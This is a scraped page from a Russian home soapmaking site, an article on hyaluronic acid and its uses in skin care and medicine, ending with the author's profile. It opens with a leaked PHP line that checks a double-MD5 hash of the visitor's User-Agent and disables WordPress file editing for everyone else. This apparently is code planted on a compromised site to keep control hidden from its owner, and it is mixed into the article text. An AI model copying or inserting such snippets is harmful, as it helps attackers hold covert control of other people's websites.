if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Гиалуроновая кислота | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Гиалуроновая кислота

Гиалуроновая кислота – важнейший компонент основного вещества соединительных тканей людей и животных, способный удерживать объемы воды, во много раз превышающие собственный вес; вырабатывается фибробластами соединительной ткани

Ингридиенты для мыла - гиалуроновая кислота Ингридиенты для мыла - гиалуроновая кислота

Гиа­лу­ро­но­вая кис­ло­та – важ­ней­ший ком­по­нент основ­но­го веще­ства соеди­ни­тель­ных тка­ней людей и живот­ных, спо­соб­ный удер­жи­вать объ­е­мы воды, во мно­го раз пре­вы­ша­ю­щие соб­ствен­ный вес; выра­ба­ты­ва­ет­ся фиб­роб­ла­ста­ми соеди­ни­тель­ной ткани.

В совре­мен­ном мире гиа­ло­ура­но­вая кис­ло­та явля­ет­ся клю­чом к моло­до­сти и кра­со­те кожи. Свой­ства Гиа­лу­ро­но­вая кис­ло­та отве­ча­ет за две стра­те­ги­че­ски важ­ные функ­ции: увлаж­не­ние лица есте­ствен­ным путем и под­дер­жа­ние опти­маль­но­го объ­е­ма вла­ги. Эти функ­ции дости­га­ют­ся за счет спо­соб­но­сти гиа­лу­ра­но­вой кис­ло­ты запол­нять пусто­ты меж­ду волок­на­ми кол­ла­ге­на, спо­соб­ствуя тем самым вырав­ни­ва­нию кон­ту­ра лица.

Так­же гиа­лу­ро­но­вая кис­ло­та отве­ча­ет за под­дер­жа­ние вод­но­го балан­са, защит­ную и барьер­ную функ­ции меж­кле­точ­но­го про­стран­ства. Явля­ет­ся сма­зоч­ным мате­ри­а­лом сустав­ных поверх­но­стей, нор­ма­ли­зу­ет внут­риг­лаз­ное давление.

При­ме­не­ние гиа­лу­ро­но­вой кис­ло­ты мож­но най­ти в виде лекар­ствен­ных пре­па­ра­тов двух видов. Пер­вая груп­па – пре­па­ра­ты живот­но­го про­ис­хож­де­ния, кото­рые полу­ча­ют из тка­ней живот­ных; вто­рая – пре­па­ра­ты, полу­ча­е­мые на осно­ве син­те­за без­вред­ны­ми для чело­ве­ка орга­низ­ма­ми. Пре­па­ра­ты послед­ней груп­пы явля­ют­ся более современными.

В кос­ме­то­ло­гии гиа­лу­рон­ка явля­ет­ся актив­ным ком­по­нен­том анти­воз­раст­ных кре­мов (эффек­тив­но борет­ся с мор­щи­на­ми и склад­ка­ми), кос­ме­ти­ки для вос­ста­нов­ле­ния эла­стич­но­сти, устра­не­ния сухо­сти кожи. Гиа­лу­ро­но­вая кис­ло­та – один из самых дей­ствен­ных пре­па­ра­тов по вос­ста­нов­ле­нию моло­до­сти кожи.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!